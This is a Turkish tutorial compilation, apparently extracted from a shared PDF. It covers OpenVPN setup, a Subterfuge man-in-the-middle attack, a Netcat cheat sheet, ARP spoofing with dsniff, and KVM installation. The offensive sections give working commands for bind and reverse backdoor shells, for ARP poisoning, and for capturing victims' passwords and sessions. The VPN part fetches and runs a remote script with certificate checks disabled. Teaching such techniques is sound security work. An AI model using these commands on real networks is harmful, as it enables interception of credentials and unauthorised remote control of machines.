Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Ebat: px
Şu sayfadan göstermeyi başlat:

Download "Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada."

Transkript

1 Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların sunucularında duran logların başkalarına verilmediğini veya trafiğinizin ne kadar güvende olduğunu bilemezsiniz. Bu yüzden bu yazıda kendi server ımıza OpenVPN kurulumunu kısaca yazacağım. (Ben DigitalOcean dan kiraladığım VPS ime Debian 7.0 x64 kurdum ama Ubuntu ve CentOS ta da çalışır.) OpenVPN kurulumu ile ilgili yazılar aradığınızda (How to install openvpn on blabla) çokca uzun ve kurarken canınızdan bezmenize neden olabilecek bir ton olay göreceksiniz. Bunun böyle olduğunun farkına varanlar sağolsunlar işi bir bash script yazarak halletmişler. Ki bunu Github ta forklayan da 300 ün üstünde kişi var, yani OpenVPN den biz çektik siz çekmeyin diyip geliştirmeye yardım etmişler. Kurulum Önce sistemimize update & upgrade yapıyoruz. apt-get update && apt-get upgrade Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada. Sağolsunlar yazdıkları küçük bir komut zinciri ile Github a uğramamızada gerek kalmıyor. wget git.io/vpn --no-check-certificate -O openvpn-install.sh; bash openvpn-install.sh Bu satırı komut satırımıza girdiğimizde bash scripti indirip

2 çalıştıracak ve bize server IP imizi soracak. Kendisi zaten IP adresimizi bulduktan sonra soruyor, teyit ettirmek için yani. Sonrasında OpenVPN için hangi porttan dinleme yapacağını soruyor. Buraya da OpenVPN için default port numarası olan 1194 değerini girip bize soruyor. Bunu herhangi bir değere set edebilirsiniz. Sonrasında sorduğu soruları uzatmadan enterlayıp geçiyoruz ki kendisi defaultta n vermiş. Sonrasında hangi DNS i kullanmak istediğinizi soruyor. Sistemin kullandığı DNS i kullanmasını söyleyip 1 diyoruz. Ardından gerekli ayarlamaları yaptığı sırada bağlanacağımız client için bir isim soruyor. Default olarak client denmiş. Ben bunu Gundy olarak değişiriyorum ve geçiyorum.

3 Sonrasında konfigürasyonlar için alacağı bilgileri bitirdi ve bizden devam için bir tuşa basmamızı istiyor. Ve önce kurulum, ardından konfigürasyonları yapıyor. Bunlardan biri bağlanmamız için gereken 2048 bitlik RSA Private Key. Anahtarı ürettikten sonra servisleri yeniden başlatacaktır ve kullanıma hazır hale gelecektir. Windows makinemizden OpenVPN client ıyla bağlandığımız sırada kullanacağımız gerekli bilgileri içeren konfigürasyon dosyası ana dizinimizde, ayarlamalar sırasında belirttiğimiz kullanıcı ismimizle oluşturulmuş ve bizi bekliyor. WinSCP veya benzeri bir uygulama ile server dan ovpn uzantılı dosyamızı çekiyoruz. Bu dosyayı OpenVPN in kurulu olduğu

4 dizindeki config klasörünün altına atıp OpenVPN istemcimizi çalıştırıyoruz. Yönetici olarak çalıştırmayı unutmayın! Tabi çalıştırdığımız zaman küçük bir ikon haline gelip görev çubuğunda görünüyor.sağ tıklayıp Bağlan diyoruz ve bağlantının oluşturulmasını bekliyoruz. Ardından bağlantıyı sağlamaya çalışıyor TLS paketleri yollayıp alıyor.

5 Ve bağlantı kurulduğu zaman bize bağlandığımız network ten atanan IP ile beraber bildiren bir uyarı çıkıyor. (Yapacaklarınız bekleme süresiyle beraber 3-5 dakika.) Subterfuge ile Man in The

6 Middle Attack Man in the middle saldırıları, saldırganın hedefindeki bilgisayarla diğer bilgisayar veya bilgisayarların ağdaki tüm veri trafiğini kendi üzerine alması yoluyla yaptığı saldırı tipidir.bu tür bir saldırıyı yapmak için temel düzeyde Layer 2 (Physical Layer) ve Layer 3 bilgisi yeterlidir. Layer 2, Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır. Layer 3, Network Katmanı, işte bu katman ip lerden oluşur, ip blokları ile tanımlanmış ağlar arasındaki veri iletişimi bu katmanda sağlanır. Layer 2 de çalışan switch mantığı; Switch herhangi bir porttan gelen bir ağ paketini alır. Aldığı paketin mac adresi anahtarın mac adres tablosu nda yoksa bunu mac adres tablosuna ekler. Aldığı paketin hedef mac adresini kendi mac adres tablosunda arar, eğer kendi mac adres tablosunda var ise bu paketi ilgili porttan gönderir. Eğer yoksa hiç bir şey yapmaz. (Drop edilir.) Not: Mac adres tablosu, mac adreslerini anahtarın portları ile ilişkilendirildiği tablodur. Bu tablo ile hangi mac adresine

7 anahtarın hangi fiziksel hangi portundan ulaşılabildiğine bakılabilir. Bazen arp tablosu ile karıştırılabilir, arp tablosu mac adreslerinin ipler ile ilişkilendirildiği tablodur. Mac Adres Tablosu 00:00:00:00:AA:AA FastEthernet 0/0 00:00:00:00:BB:BB FastEthernet 0/0 00:00:00:00:CC:CC FastEthernet 0/1 Arp Tablosu 00:00:00:00:AA:AA :00:00:00:BB:BB :00:00:00:CC:CC Peki örneğin ip li bilgisayar, ip li bir bilgisayar ile iletişimi geçmek isterse ne yapar? Layer 2 de bilgisayarlar birbirleri ile iletişime geçmek için mac adreslerini kullanırlar, IP ler ise Layer 3 te işimize yarar. Yani aynı ağdaki 2 bilgisayar iletişime geçmek için birbirlerinin mac adreslerini bilmek zorundadırlar. Sorunun cevabına gelince; ipli bilgisayar kendi arp tablosuna bakar, ipli bilgisayar arp tablosunda varsa arp time out süresi içinde zaten bu bilgisayar ile bir iletişime geçilmiş demektir. Eğer yok ise bu bilgisayar ile henüz bir görüşme sağlanmamış demektir yani bağlantı için ilk adıma geçilir. Bu da arp request broadcast paketini göndermekle başlar. Arp request paketi ağdaki tüm bilgisayarlara iletilir ve sorar kim? , bu arp sorusuna benim diye cevap verir ve bu cevabın içinde de kendi mac adresi vardır den gelen cevabı alan ipli bilgisayar artık ipli bilgisayarın mac adresini biliyor, yani onunla iletişime geçmek için yeterli bilgisi var.

8 Göndermek istediği paketin kaynak mac adresine kendi mac adresini, hedef mac adresinin yerine ise ipli bilgisayarın mac adresini ekleyerek paketi gönderir. Tam bu noktada eğer biz ü yanıltır ve nin mac adresi o değil bu diyerek kendi mac adresimizi yazarsak ne olur? Paket bize gönderilir. Peki, aynı paketi alıp ye biz göndersek ve yanıt bize gelse bizde aldığımız cevabı tekrar e gönderirsek ne olur? ün e gönderdiği tüm verileri kendi üzerimize almış oluruz ve eğer bu ağda internete çıkmak için kullanılan modem, router, proxy veya benzeri bir cihaz ise ün bütün internet faaliyetleri bizim kontrolümüz dahilinde gerçekleşir. Subterfuge ile MITM ın nasıl yapıldığını görelim > SETUP (Kurulum) Kali makinasında Subterfuge un en son sürümünü indiriyoruz; $ wget eb Komutu yazarak yükleme işlemi yapıyoruz; $ dpkg -i subterfuge_1.0-1_all.deb Subterfuge a bağlı olan şeyler var ise onları da update ediyoruz. $ apt-get update && apt-get -f install Subterfuge u çalıştırıyoruz. $ subterfuge

9 Sonra tarayıcımızdan e giderek Subterfuge arayüzüne ulaşıyoruz. Arayüzde Settings kısmına tıklıyoruz ve ekrandaki ayarlamaları yapıyoruz. Sonrasında MITM Vectors istediğimiz adresini yazıyoruz. sekmesine tıklayarak zehirlemek IP

10 Sonra Modules sekmesine tıklayarak Network View e tıklıyoruz ve Apply tuşuna basıyoruz. IP adresi olan kurban (victim) Linux makinayı görüyoruz. Burada Scan tuşu ile açık olan portları görebiliriz. Kontrol etmek istediğimiz saldırı türünüde istersek Controls kısmındaki simgelerden(http Injection,DoS Attack vs.) gerçekleştirebiliriz.kurban bilgisayardaki kişi eğer login olarak herhangi bir yere giriş yapıyor ise o bilgiler bizim elimize ulaşmış oluyor.

11 Siteye yaptığı girişin session bilgileri de elimize ulaşıyor. Mesela kurban bir siteye giriş yapsın. Ve bu bilgiler, log in tuşuna bastıktan sonra bizim Subterfuge ekranımıza düşmüş oluyor. Bu şekilde router ve kurban bilgisayar arasında MITM saldısını gerçekletirmiş oluyoruz. Netcat Kullanımı Bu doküman, Netcat in hem Linux hem de UNIX sistemlerdeki çeşitli kullanım şekillerinden bahsetmektedir. Temel Kullanım : Basit Netcat Istemci #nc [Hedef IP] [Port] Vermiş olduğunuz hedef IP nin yine vermiş olduğunuz porta bağlantı kurar. Basit Netcat Dinleyici #nc l p [localport] Yerelde verdiğiniz portta Netcat dinleyici kurar.

12 Netcat Komutları #nc [options] [Hedef IP Adresi] [port/lar] [Hedef IP Adresi] kısmı basit olarak karşı tarafın IP adresi ya da domain adıdır. -l : Listen mod ( dinleme modu ) (varsayılan olarak istemci moddadır) -L : Listen harder (yalnızca Netcat in Windows versiyonu için desteklidir. Bir istemci bağlantısı koptuktan sonra tekrar dinlemeyi otomatik başlatmak amacıyla Netcat e kalıcı bağlantı sağlar.) -u : UDP mod (varsayılan TCP) -p istemci : Yerel port (Dinleme modunda bu port dinlenir, modda ise bütün paketlerin gönderildiği kaynak porttur.) -e : Kurulan bağlantıdan sonra program çalıştırmaya yarar. n : DNS sorgusu yapmaması için kullanılır. -z : Zero I/O mod (Hiçbir very göndermez) -wn :Bağlantı timeout, STDIN kapandıktan sonra N saniye bekler.bir Netcat istemci veya dinleyici bu komut ile bağlantı kurması için N sn bekler. Eğer bu süre zarfında bağlantı gerçekleşmezse Netcat çalışmayı durdurur. -v :Ayrıntılı modu. Meydana gelen Standart Error hatayı ekrana yazdırır. -vv :Daha Ayrıntılı modu. Standart Error hakkında daha fazla ayrıntı yazdırır. Netcat Windows Kullanımı : İstemci den Dinleyici ye Aktarım

13 C: \> echo nc [Hedef IP] [Hedef Port] > deneme.bat C: \> nc l p [YerelPort] e deneme.bat YerelPort dan Hedef IP nin Hedef Portuna kurulan bağlantı ile paketler gönderilir. Dinleyici-Dinleyici Aktarım C: \> echo nc l p [YerelPort2] > deneme.bat C: \> nc l p [YerelPort1] e deneme.bat YerelPort1 de kurulan bir bağlantı ile YerelPort2 ye paket gönderimi şeklinde bir aktarım oluşturulur. İstemci-İstemci Aktarım C: \> echo nc [Sonraki IP] [Port 2] > deneme.bat C: \> nc [Önceki IP] [Port 1] -e deneme.bat Önceki IP nin Port 1 inden Sonraki IP nin Port 2 sine paket gönderimi ile aktarım olur. Dosya Transferi İstemciden Dinleyiciye Dosya Gönderme #nc l p [Yerel Port] > [giden dosya] Yerel Port dinlenir ve giden dosya çıktısı yüklenir. #nc w3 [Hedef IP] [Hedef Port] < [gelen dosya] gelen dosya Hedef IP nin Hedep portuna push edilir. Dinleyici den İstemci ye Dosya Çekmek #nc l p [Yerel Port] < [gelen dosya] Yerel Port dinlenir ve gelen dosya push etmeye hazırlanır. #nc w3 [Hedef IP] [Hedef Port] > [giden dosya]

14 Hedef IP nin Hedef Portu ile bağlantı kurulur ve giden dosya çekilir. TCP Port Tarayıcı IP Adresin Port Taraması #nc v n z w1 [Hedef IP] [Başlangıç portu]-[bitiş portu] Belirtilen port aralığında hedef IP ye n (isimleri çözmeden) z (herhangi bir data göndermeden) w1 Bağlantı kurmak için 1 sn den daha fazla beklemeden port taraması gerçekleştirme işlemine başlar. TCP Banner Grabber Linux IP adresine üzerinde çalışan TCP servislere Banner Grabbing #echo nc v n w1 [Hedef IP] [baş. port]- [bitiş Port] Backdoor Shell Linux da backdoor shell dinleme #nc l -p [Yerel Port] e /bin/bash Windows da backdoor shell dinleme C: \> nc l p [Yerel Port] e cmd.exe Tersine backdoor shell dinleme (Linux) # nc [Senin IP adresin] [port] e /bin/bash Tersine backdoor shell dinleme (Windows) C: \> nc [Senin IP adresin] [port] e cmd.exe

15 OS X Dsniff Kullanımı Dsniff nedir? Bu program gelişmiş bir şifre sniffer dır. Birçok protokolü tanır, TELNET, FTP, SMTP, Post Office Protocol (POP), Internet Message Access Protocol (IMAP), HTTP, CVS, Citrix, Server Message Block (SMB), Oracle ve daha fazlasını içerir.diğer sniffer lar gibi değildir, örneğin Wireshark tekil paketler ve bağlantı hakkında çok fazla ve detaylı bilgi verir eğer sizin tek istediğiniz şifre ve kullanıcı adı ise dsniff kullanabilirsiniz. Ayrıca bu kurulumla yüklenecek araçlar: Filesnarf, Mailsnarf, Msgsnarf, Urlsnarf, ve Webspy,Arpspoof 1. Komut satırına öncellikle aşağıdaki komutu yazıyoruz. xcode-select install Öncellikle yukarıdaki komut ile eksik araçlarını yüklemeniz gerekmektedir. olan geliştirici OS X Dsniff Kurulumu: 1. MacPorts un size uygun olan versiyonunu indirin ve kurun. (MacPorts İndir) 2. Terminal açın ve aşağıdaki kodu çalıştırın> port install dsniff Dsniff ile Man in the Middle Attack: Uygulayacağımız Adımlar > 1. 1.İP Yönlendirme: OSx için: sudo sysctl -w net.inet.ip.forwarding=1 Linux için: echo 1 > /proc/sys/net/ipv4/ip_forward

16 1. 2.Arpspoofing. 2. İki tane terminal açın ve aşağıdaki komutları ayrı ayrı çalıştırınız. 1.Terminal için: arpspoof -i en0 -t KurbanIP BizimIP 2.Terminal için: arpspoof -i en0 -t BizimIP KurbanIP 1. 3.Dsniff ile Şifre ve Kullanıcı adlarını çekmek: 2. A ş a ğ ı d a k i K o m u t i l e o t o m a t i k o l a r a k K u r b a n ı n Bağlantılarını dinleyerek sizin için şifre ve kullanıcı adını çekecektir. dsniff -i en0 Not: İnterface kısmına en0 OSx için yazdım siz linux kullanıyorsanız eth0 yapmalısınız, bilgisayarınızın ethernet card ına göre değişir. KVM nedir? Nasıl kurulur? En basit tanımıyla KVM Çekirdek Makina (Kernel Based Virtual Machine) dır. Temelli Sanal Yurt dısı veya içinden satın alacağız VPS makinelerinin kurulu olduğu fiziksel makinelerin bir çoğu da alt yapı olarak kvm kullanmaktadır. Normalde VmWare,Virtualbox ile yaptığımız sanallaştırmanın nesi vardı da çıktı bu KVM? Küçük bir araştırma yaptıktan sonra bu soruya cevap bulmak çok da zor olmasa gerek. KVM ile sanallaştırma kernel seviyesine inmiştir. Önceden

17 işletim sistemi sistemi üzerinde bir uygulama gibi çalışan VMWare gibi sanallaştırma çözümlerinin yavaş olması ve pek çok konuda ana işletim sistemine muhtaç olması istenmeyen bir durumla kullanıcıyı yüz yüze bırakmaktadır. Hypervisor gibi teknolojiler ile bazı sorunların üstesinden gelmeye çalışsalar da bu çözümler başka sorunları da ortaya çıkarmıştır. Geliştirilen KVM ile bu konularda önemli adımlar atılmıştır. Kvm ile sanal makinanın hızı neredeyse ana makinadaki işletim sisteminin hızı ile aynıdır. Kernel düzeyinde bir sanallaştırma sadece ekonomik olarak değil,güvenlik ve süreklilik gibi konularda da kullanıcı dostu bir sanal işletim sistemi sunmaktadır. Bilgisayarın tüm donanım haklarına erişebilen bir yapı tabi ki oldukça güçlüdür.yani VMware gibi sizin bir malikane sahibi olduğunuzu varsayıp o malikenin sadece bir odasını kullandırmak yerine size malikaneyi vaadediyor. Nasıl Kurarım? Öncelikle kuruluma başlamadan önce bilgisayarımızda BIOS ayarlarına girip anakarttımızın virtualisation özelliğinin enabled olmasına dikkat edelim ki benim gibi tüm gün neden hata veriyor bu program demeyelim.:) 1.Benim işlemcim sanal makine için yeterli mi? Sizde takdir edersiniz ki tek çekirdekli bir makineye sanal makine kurmak pek de önerilen birşey değil(kurabilen varsa beri gelsin).peki benim makinem kaç cekirdek CPU durumu ne sorusuna cevap alacağımız aşağıdaki komutu giriyoruz. egrep (vmx svm) color=always /proc/cpuinfo grep vmx Bu komutun cıktısında birden fazla sayıda vmx yazısı görüyor iseniz kullandığınız cihaz sanallaştırma için uygun demektir. 2.Kurulum Bu post kvmnin ubuntu ve debian sistemlere nasıl kurulacağını

18 anlattığından apt kullanıyor olacağız.aşağıdaki gerekli paketlerin kurulumunu yapıyoruz. komutla apt-get install qemu-kvm libvirt-bin bridge-utils virtmanager virtinst kvm 3.Gerekli Kullanıcı ve grupların eklenmesi Şimdi kendimizi programı kullanacak kullanıcı ekliyoruz. Misal ben kendi bilgisayarımda kullanıcısıyım.vereceğim komut adduser dimakoci adduser dimakoci libvirtd(debian olarak dimakoci sistemlerinde burada vermemiz gereken komut adduser dimakoci libvirt) adduser dimakoci kvm Bu adımlardan sonra sistemden log out olup tekrar giriş yapmamız gerekmekte. 4.Adım Kontrol Bu aşamaya gelmeden önce yukarıdaki adımları eksiksiz olarak yaptınız ve herhangi bir hata almadınız ise kvm yi sisteminize kurmuşsunuz demektir.şimdi kontrol edelim.sistemin kurulup kurulmadığını anlamamızın bir çok yolu vardır.ben tek aşamada aşağıdaki kodu kullanarak bu işi yapıyorum. virsh -c qemu:///system list Ayrıca virsh ve akabinde list komutu vererek de aynı işlemi yapmış olursunuz. Bu aşamadan sonra Kvm kullanıma hazır.isterseniz terminalden virt-manager yazarak,isterseniz menu>system>virtual machine manager a tıklayarak çalıştırabilirsiniz

Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır.

Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır. Subterfuge ile Middle Attack Man in The Man in the middle saldırıları, saldırganın hedefindeki bilgisayarla diğer bilgisayar veya bilgisayarların ağdaki tüm veri trafiğini kendi üzerine alması yoluyla

Detaylı

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada. Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların

Detaylı

Yum ile Paket Yönetimi

Yum ile Paket Yönetimi Yum ile Paket Yönetimi Bu yazının birinci kısmında Debian sistemler için paket yönetimini yazmıştık.bu yazımıza buradan ulaşabilirsiniz.yazıya devam etmeden önce yum ve rpm kavramlarından bahsedeyim kısaca.yum(yellowdog

Detaylı

TCP/IP. TCP (Transmission Control Protocol) Paketlerin iletimi. IP (Internet Protocol) Paketlerin yönlendirmesi TCP / IP

TCP/IP. TCP (Transmission Control Protocol) Paketlerin iletimi. IP (Internet Protocol) Paketlerin yönlendirmesi TCP / IP TCP/IP Protokolü TCP/IP TCP/IP nin tarihi ARPANET ile başlayan Internetin tarihidir. Adreslerin dağıtımı NIC (Network Information Center) tarafından yapılır. Türkiye de ise bunu ODTÜ-TUBİTAK yapmaktadır.

Detaylı

HUAWEI Cihazlara Erişim Yöntemleri

HUAWEI Cihazlara Erişim Yöntemleri HUAWEI Cihazlara Erişim Yöntemleri 24/06/2013 GİRİŞ Bir Huawei cihaza nasıl erişiriz sorusuna cevap vermek için, öncelikle belirlenmesi gereken, cihaz üzerinde ne yapılmak istendiğidir. Cihaza bir dosya

Detaylı

LİNUX İŞLETİM SİSTEMİNİN KÖPRÜ MODUNDA ÇALIŞTIRILMASI VE GÜVENLİK DUVARI İŞLEMLERİ

LİNUX İŞLETİM SİSTEMİNİN KÖPRÜ MODUNDA ÇALIŞTIRILMASI VE GÜVENLİK DUVARI İŞLEMLERİ LİNUX İŞLETİM SİSTEMİNİN KÖPRÜ MODUNDA ÇALIŞTIRILMASI VE GÜVENLİK DUVARI İŞLEMLERİ Belge Hakkında Bu belge GNU Free Documentation Licence ı ile kaynak gösterilmek ve önceden yazarından izin alınmak kaydıyla

Detaylı

Web Servis-Web Sitesi Bağlantısı

Web Servis-Web Sitesi Bağlantısı Web Servis-Web Sitesi Bağlantısı MCKS İthalatçı web servisleri internet üzerinden güvenli şekilde erişime açılmıştır. Erişime ait ağ bağlantısı aşağıda şematik olarak gösterilmiştir. Şekil - 1: MCKS-ithalatçı

Detaylı

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat

Denetim Masası/Programlar/Windows özelliklerini Aç/Kapat Merhaba arkadaşlar, Bu yazımızda yerel ağda veya Ip adresimizle bir web sitesinin paylaşıma açılması, aynı ağdan veya uzaktan bir bilgisayarın web sitemize nasıl erişebileceği konuları üzerinde duracağız.

Detaylı

Hızlı Kurulum ve Yapılandırma Kılavuzu

Hızlı Kurulum ve Yapılandırma Kılavuzu Hızlı Kurulum ve Yapılandırma Kılavuzu İçindekiler SPX Özellikleri... 2 SPX Kurulum... 3 Hedef Oluşturma... 9 Yeni Görev Oluşturma... 12 Görüntü Zinciri Tarayıcısı... 15 Eposta Bildirimi Oluşturma... 16

Detaylı

Kurumsal Güvenlik ve Web Filtreleme

Kurumsal Güvenlik ve Web Filtreleme S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 Yönetici olarak AntiKor a girmek için SshClient veya Putty programı kullanılır. IP olarak kurum içinden

Detaylı

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING)

SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING) SAMURAİ FRAMEWORK İLE HACKİNG-1 (FOOTPRINTING) Merhaba arkadaşlar. Samurai Framework ile Temel Hacking makale serisinin ikinci kısmını bu ve devamında ki makalelerimizde inceleyeceğiz. Bu makalemizde temel

Detaylı

BEUN VPN Hizmeti. VPN Nedir?

BEUN VPN Hizmeti. VPN Nedir? BEUN VPN Hizmeti VPN Nedir? VPN, Virtual Private Network, yani Sanal Özel Ağ ın kısaltılmasıdır. VPN, İnternet gibi halka açık telekomünikasyon altyapılarını kullanarak kullanıcılar veya uzak ofisleri

Detaylı

KALİ SUNUCUDA TOR, PROXYCHAINS, PRIVOXY, TOR- TUNNEL KURULUMU VE KULLANIMI

KALİ SUNUCUDA TOR, PROXYCHAINS, PRIVOXY, TOR- TUNNEL KURULUMU VE KULLANIMI KALİ SUNUCUDA TOR, PROXYCHAINS, PRIVOXY, TOR- TUNNEL KURULUMU VE KULLANIMI Bu yazımda Kali Linux üzerinden taramaları ve çeşitli testleri gerçekleştirirken, eğer iz bırakmak ve hedef sistemlerde loglara

Detaylı

Kurumsal Güvenlik ve Web Filtreleme

Kurumsal Güvenlik ve Web Filtreleme S a y f a 1 antikor Kurumsal Güvenlik ve Web Filtreleme SshClient, Putty v.s. S a y f a 2 S a y f a 3 S a y f a 4 S a y f a 5 S a y f a 6 S a y f a 7 şeklini alır. Bu durumda kullanıcı yasaklı konumdadır.

Detaylı

Program Kurulum. Turquaz Muhasebe. İçindekiler

Program Kurulum. Turquaz Muhasebe. İçindekiler Program Kurulum Turquaz Muhasebe İçindekiler İÇİNDEKİLER 1 1. TEK KULLANICI 2 2. AĞ KURULUMU 4 2.1 VERİTABANI SERVER KURULUMU 4 2.2 VERİTABANI SERVER AYARLARI 11 2.3 DATALARIN YÜKLENMESİ 11 2.4 İSTEMCİ

Detaylı

3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme

3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme 3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme Windows: 1. Adım: Not: Versiyon 12.5, 14 ve 15 için aynı menü yolunda ancak görsellik farkı bulunmaktadır. V15 için: 3CX

Detaylı

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2. İçerik. IP ICMP MAC Tracert

Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü. Bilgisayar Ağları Dersi Lab. 2. İçerik. IP ICMP MAC Tracert Gazi Üniversitesi Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü Bilgisayar Ağları Dersi Lab. 2 İçerik IP ICMP MAC Tracert 1 IP Protokolü Ağ katmanı paketlerin kaynaktan hedefe ulaşmasından sorumludur.

Detaylı

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz. VLAN Yapılandırma Değerli Müşterimiz, VLAN özelliği ile yerel ağınızı segmentlere ayırarak bölebilir ve aynı ağ geçidini kullanarak internete çıkabilen bu segmentlerin birbirlerine erişimlerini engelleyebilirsiniz.

Detaylı

Subnet A da bulunan DHCP Server makinesinin ve client makinenin IP yapılandırması aşağıdaki gibidir.

Subnet A da bulunan DHCP Server makinesinin ve client makinenin IP yapılandırması aşağıdaki gibidir. DHCP Relay Agent Uygulaması DHCP Relay Agent servisi DHCP nin bulunmadığı diğer subnet lerdeki bir Windows Server 2003 üzerine kurulur. Böylece diğer subnet lerdeki IP adresi isteği DHCP nin bulunduğu

Detaylı

WAMP SERVER KURULUMU

WAMP SERVER KURULUMU WAMP SERVER KURULUMU Bilgisayarınızda; PHP web programlama dilini kullanarak web sayfası hazırlayacaksanız ya da PHP web programlama dili kullanılarak hazırlanmış Joomla, Wordpress, Drupal vb.. içerik

Detaylı

Anti-Virüs Atlatma 3. Kurulum

Anti-Virüs Atlatma 3. Kurulum Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass aracıdır.

Detaylı

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz. USB Disk Paylaşımı Değerli Müşterimiz, AirTies desteklediği USB Tak&Paylaş özelliği ile hiçbir ekstra donanıma ihtiyaç duymadan yaygın olarak kullanılan standart USB disk sürücülerinizi tüm ağınıza paylaştırmanıza

Detaylı

Free Cooling (Tibbo Ethernet Modüllü)

Free Cooling (Tibbo Ethernet Modüllü) Free Cooling (Tibbo Ethernet Modüllü) Cihaz İnternet Ayarları Cihazı ethernet kablosu kullanarak ilk olarak ayar yapacağınız bilgisayara direkt olarak bağlayınız. Cihazlar varsayılan olarak 192.168.1.40

Detaylı

INTERNET BAĞLANTISININ KURULMASI İÇİN GEREKLİ YÖNLENDİRİCİ AYARLARI

INTERNET BAĞLANTISININ KURULMASI İÇİN GEREKLİ YÖNLENDİRİCİ AYARLARI INTERNET BAĞLANTISININ KURULMASI İÇİN GEREKLİ YÖNLENDİRİCİ AYARLARI Not: Bu klavuza geçmeden önce, ürününüzün paketinden çıkan Hızlı Kullanım Klavuzu nda açıklanan adımları gerçekleştiriniz. Internet Bağlantısının

Detaylı

Bu bölüm V- Ray License Server lisans sunucusu uygulamasının kurulumundan

Bu bölüm V- Ray License Server lisans sunucusu uygulamasının kurulumundan Lisans Sunucusu Kurulumu bahsedecektir. Bu bölüm V- Ray License Server lisans sunucusu uygulamasının kurulumundan V-Ray in bazı dağıtımlarında V-Ray License Server uygulamasını kuruludur. Yine de V- Ray

Detaylı

Erişim Noktası Ayarları

Erişim Noktası Ayarları Erişim Noktası Ayarları Değerli Müşterimiz, Cihazınızı erişim noktası cihazı olarak kullanabilmek için aşağıdaki adımları takip etmeniz gerekmektedir. Statik IP Tanımlama AirTies Kablosuz Erişim Noktası

Detaylı

Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine)

Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine) Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine) İçindekiler Tablosu Dosyaların Bilgisayara İndirilmesi... 3 Dosyaların Bilgisayara Yüklenmesi... 5 1. İnternet Üzerinden Kurulum 5 1.1. Lisans Dosyasının

Detaylı

CYGWIN KURULUMU ve KULLANIMI

CYGWIN KURULUMU ve KULLANIMI CYGWIN KURULUMU ve KULLANIMI Cygwin, Microsoft Windows işletim sistemi üzerinde çalışan, open source, bir UNIX simülatörüdür. Cygwin`in asıl amacı *nix türevi sistemlerde yer alan yazılımların Windows

Detaylı

Anti-Virüs Atlatma 2. Kurulum

Anti-Virüs Atlatma 2. Kurulum Anti-Virüs Atlatma 2 Merhaba, bu yazımızda işleyeceğimiz araç Veil-evasion dur. Veil, açık kaynak kodlu olarak geliştirilen bir framework tür. Biz Veil framework içerisindeki anti-virüs atlatma aracı olan

Detaylı

INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU

INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU INHAND ROUTER LAR İÇİN PORT YÖNLENDİRME KILAVUZU Z Telemetri Telekomünikasyon Yazılım San. Tic. LTD. ŞTI. Kavaklıdere Mah. Atatürk Bulvarı No: 151/804 Çankaya / Ankara info@ztelemetry.com Tel: +90 312

Detaylı

P-TECH RF MODEM İLE MODBUS TCP HABERLEŞME

P-TECH RF MODEM İLE MODBUS TCP HABERLEŞME P-TECH RF MODEM İLE MODBUS TCP HABERLEŞME Z Telemetri Telekomünikasyon Yazılım San. Tic. LTD. ŞTI. Kavaklıdere Mah. Atatürk Bulvarı No: 151/804 Çankaya / Ankara info@ztelemetry.com Tel: +90 312 417 1243

Detaylı

vsphere Client(viClient) ile ESXI Kontrolü

vsphere Client(viClient) ile ESXI Kontrolü vsphere Client(viClient) ile ESXI Kontrolü - ESXI ye Tarayıcıdan Bağlanmak - ESXI ye vsphere Client ile Bağlanmak - ESXI Üzerinde Bir Virtual Machine(Sanal Makine) Oluşturmak ESXI ye Tarayıcıdan Bağlanmak

Detaylı

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI 1 Başlarken Satın almış olduğunuz TL-WPS510U nun kullanım diagramı aşağıdaki gibidir. Cihazınızı bir ağ yazıcısı değilse veya kablolu ağ yazıcınızı kablosuz olarak

Detaylı

Windows Server 2012 Active Directory Kurulumu

